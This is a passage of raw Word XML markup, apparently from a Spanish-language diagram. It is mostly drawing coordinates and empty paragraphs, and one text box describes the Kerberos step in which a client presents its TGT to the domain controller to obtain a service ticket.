                                  <a:pt x="21463" y="1391412"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30226" y="1444879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="40259" y="1498981"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="51435" y="1553464"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63500" y="1608328"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76454" y="1663573"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90170" y="1719072"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="104521" y="1774698"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="134493" y="1886712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165481" y="1998980"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="177673" y="1995678"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="146812" y="1883410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="116840" y="1771523"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="102489" y="1715897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="88277" y="1658569"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="77787" y="1613814"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76568" y="1608328"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75844" y="1605559"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75907" y="1605394"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63754" y="1550797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52705" y="1496568"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42672" y="1442847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="34036" y="1389507"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26543" y="1336802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20599" y="1284732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20485" y="1283792"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16332" y="1234059"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13601" y="1182878"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12700" y="1132586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13830" y="1083576"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16967" y="1035646"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="22326" y="988783"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30099" y="941451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39674" y="898271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="53289" y="850417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68186" y="808647"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76949" y="787425"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="77050" y="787196"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="96520" y="745744"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="119773" y="704494"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143929" y="667677"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173355" y="629158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205613" y="592836"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="241160" y="558038"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280644" y="524344"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="322795" y="492836"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395465" y="447167"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="447941" y="419100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="504050" y="392493"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="564134" y="367030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="626668" y="343446"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="693000" y="320916"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="765441" y="298869"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="838568" y="278803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="913130" y="260223"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="991870" y="242570"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1073404" y="225933"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1157478" y="210312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1243965" y="195707"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1332865" y="181991"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1423924" y="169164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1612265" y="146177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1807845" y="126111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2113153" y="100711"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2534551" y="73660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3115678" y="44424"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="3665854" h="2390775">
                                <a:moveTo>
                                  <a:pt x="3191510" y="34417"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3184017" y="31115"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3113532" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3115030" y="31115"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3115056" y="31724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3115653" y="43815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3115678" y="44424"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3117088" y="73660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3117215" y="76073"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3191510" y="34417"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="3665854" h="2390775">
                                <a:moveTo>
                                  <a:pt x="3665715" y="1211199"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3664991" y="1184465"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3664966" y="1183259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3662349" y="1157338"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3662235" y="1156157"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3662172" y="1155446"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3657346" y="1127506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3642360" y="1072007"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3620897" y="1016635"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3593719" y="961390"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3561842" y="906145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3525774" y="851027"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3486531" y="795909"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3445002" y="740791"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3401822" y="685927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3357880" y="630936"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3347974" y="638810"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3391916" y="693801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3434969" y="748538"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3476371" y="803402"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3515233" y="858139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3550920" y="912749"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3582555" y="967295"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3582606" y="967422"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3582428" y="967295"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3584067" y="970254"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609149" y="1021448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3628847" y="1072007"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3630218" y="1075994"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3630345" y="1076185"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3638372" y="1102702"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3644658" y="1129309"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3649256" y="1155446"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3649383" y="1156157"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3652151" y="1183259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3652278" y="1184465"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3653028" y="1210691"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3650335" y="1250391"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3642728" y="1290002"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3629393" y="1331188"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3610356" y="1371854"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3585210" y="1412240"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3553244" y="1453159"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3515347" y="1493266"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3470021" y="1533652"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3435743" y="1560741"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3435553" y="1560868"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3434765" y="1561490"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3398291" y="1587792"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3398139" y="1587919"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3358134" y="1614805"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3316313" y="1641055"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3269107" y="1669034"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3220593" y="1696212"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3166427" y="1724774"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3115818" y="1750314"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3060065" y="1777492"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3001899" y="1804416"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2941701" y="1831594"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2879471" y="1858645"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2815336" y="1885696"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2681605" y="1939925"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2549664" y="1990801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2391600" y="2049399"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2089785" y="2156206"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1518373" y="2348306"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1508417" y="2318258"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1508379" y="2318131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1448054" y="2378329"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1532382" y="2390521"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1523695" y="2364359"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1522374" y="2360358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2093976" y="2168271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2399792" y="2059940"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2545715" y="2005838"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2686304" y="1951736"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2820162" y="1897507"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2884424" y="1870329"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2946781" y="1843151"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3007233" y="1815973"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3065399" y="1788922"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3121406" y="1761744"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3175127" y="1734566"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3226562" y="1707388"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3275330" y="1680083"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3321558" y="1652778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3364992" y="1625600"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3405505" y="1598168"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3443351" y="1570863"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3478022" y="1543558"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3509645" y="1516126"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3538093" y="1488567"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3574923" y="1447292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3604895" y="1405763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3628644" y="1364119"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3646170" y="1322451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3657981" y="1280795"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3664331" y="1238885"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3665715" y="121119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2E4F5A" id="Group 178" o:spid="_x0000_s1026" style="position:absolute;margin-left:138.1pt;margin-top:1.45pt;width:730pt;height:512.9pt;z-index:-17966080;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="92710,6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">
                <v:shape id="Image 179" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:86837;height:6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">
                  <v:imagedata r:id="rId71" o:title=""/>
                </v:shape>
                <v:shape id="Image 180" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:14414;top:1418;width:61634;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">
                  <v:imagedata r:id="rId72" o:title=""/>
                </v:shape>
                <v:shape id="Image 181" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:76972;top:3028;width:254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">
                  <v:imagedata r:id="rId73" o:title=""/>
                </v:shape>
                <v:shape id="Image 182" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:80429;top:1586;width:1227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">
                  <v:imagedata r:id="rId80" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 183" o:spid="_x0000_s1031" style="position:absolute;left:37993;top:41346;width:23901;height:7391;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2390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" path="m2389631,l,,,739139r2389631,l2389631,xe" fillcolor="#e7e6e6" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 184" o:spid="_x0000_s1032" style="position:absolute;left:37993;top:41346;width:23901;height:7391;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2390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" path="m,739139r2389631,l2389631,,,,,739139xe" filled="f" strokecolor="#4471c4" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 185" o:spid="_x0000_s1033" style="position:absolute;left:8745;top:22043;width:36658;height:23908;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3665854,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" path="m3115678,44424l2536063,60833,2112264,88011r-205105,16383l1707896,123063r-192278,21590l1422273,156591r-91313,12827l1241933,183134r-86614,14732l1070991,213487r-81788,16637l910209,247904r-76200,18923l760730,287020r-70371,21336l623316,331089r-63881,24130l499110,380746r-56769,27051l389001,436245r-49403,29972l294005,497967r-41783,33274l214122,566039r-34544,36195l148590,640080r-27813,38989l96266,719455,74930,760984,56388,803910,40767,847852,27940,892810,17653,938911,9906,985901r-5461,48133l1143,1082802,,1132586r876,49911l889,1182878r2590,49745l3556,1234059r4140,49733l7747,1284490r6223,53836l21463,1391412r8763,53467l40259,1498981r11176,54483l63500,1608328r12954,55245l90170,1719072r14351,55626l134493,1886712r30988,112268l177673,1995678,146812,1883410,116840,1771523r-14351,-55626l88277,1658569,77787,1613814r-1219,-5486l75844,1605559r63,-165l63754,1550797,52705,1496568,42672,1442847r-8636,-53340l26543,1336802r-5944,-52070l20485,1283792r-4153,-49733l13601,1182878r-901,-50292l13830,1083576r3137,-47930l22326,988783r7773,-47332l39674,898271,53289,850417,68186,808647r8763,-21222l77050,787196,96520,745744r23253,-41250l143929,667677r29426,-38519l205613,592836r35547,-34798l280644,524344r42151,-31508l395465,447167r52476,-28067l504050,392493r60084,-25463l626668,343446r66332,-22530l765441,298869r73127,-20066l913130,260223r78740,-17653l1073404,225933r84074,-15621l1243965,195707r88900,-13716l1423924,169164r188341,-22987l1807845,126111r305308,-25400l2534551,73660,3115678,44424xem3191510,34417r-7493,-3302l3113532,r1498,31115l3115056,31724r597,12091l3115678,44424r1410,29236l3117215,76073r74295,-41656xem3665715,1211199r-724,-26734l3664966,1183259r-2617,-25921l3662235,1156157r-63,-711l3657346,1127506r-14986,-55499l3620897,1016635r-27178,-55245l3561842,906145r-36068,-55118l3486531,795909r-41529,-55118l3401822,685927r-43942,-54991l3347974,638810r43942,54991l3434969,748538r41402,54864l3515233,858139r35687,54610l3582555,967295r51,127l3582428,967295r1639,2959l3609149,1021448r19698,50559l3630218,1075994r127,191l3638372,1102702r6286,26607l3649256,1155446r127,711l3652151,1183259r127,1206l3653028,1210691r-2693,39700l3642728,1290002r-13335,41186l3610356,1371854r-25146,40386l3553244,1453159r-37897,40107l3470021,1533652r-34278,27089l3435553,1560868r-788,622l3398291,1587792r-152,127l3358134,1614805r-41821,26250l3269107,1669034r-48514,27178l3166427,1724774r-50609,25540l3060065,1777492r-58166,26924l2941701,1831594r-62230,27051l2815336,1885696r-133731,54229l2549664,1990801r-158064,58598l2089785,2156206r-571412,192100l1508417,2318258r-38,-127l1448054,2378329r84328,12192l1523695,2364359r-1321,-4001l2093976,2168271r305816,-108331l2545715,2005838r140589,-54102l2820162,1897507r64262,-27178l2946781,1843151r60452,-27178l3065399,1788922r56007,-27178l3175127,1734566r51435,-27178l3275330,1680083r46228,-27305l3364992,1625600r40513,-27432l3443351,1570863r34671,-27305l3509645,1516126r28448,-27559l3574923,1447292r29972,-41529l3628644,1364119r17526,-41668l3657981,1280795r6350,-41910l3665715,1211199xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045A542" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE1BAE2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CB24C6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4EB45E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226A5E54" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B190CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680D3C4C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECF2D6A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0E145F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30306AB0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="207"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C79A42C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="453"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07ABA0FC" wp14:editId="5E4B9FB6">
                <wp:extent cx="2341245" cy="954405"/>
                <wp:effectExtent l="9525" t="0" r="1905" b="7619"/>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954405"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1B9B6548" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58" w:line="339" w:lineRule="exact"/>
                              <w:ind w:right="1"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>1. El cliente envía la corriente</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="338934A1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="2" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="163" w:right="160" w:hanging="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>TGT para solicitar TGS al DC (también le dice al servicio al que desea acceder)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="07ABA0FC" id="Textbox 186" o:spid="_x0000_s1114" type="#_x0000_t202" style="width:184.3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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1B9B6548" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58" w:line="339" w:lineRule="exact"/>
                        <w:ind w:right="1"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>1. El cliente envía la corriente</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="338934A1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="2" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="163" w:right="160" w:hanging="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>TGT para solicitar TGS al DC (también le dice al servicio al que desea acceder)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C1BB3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
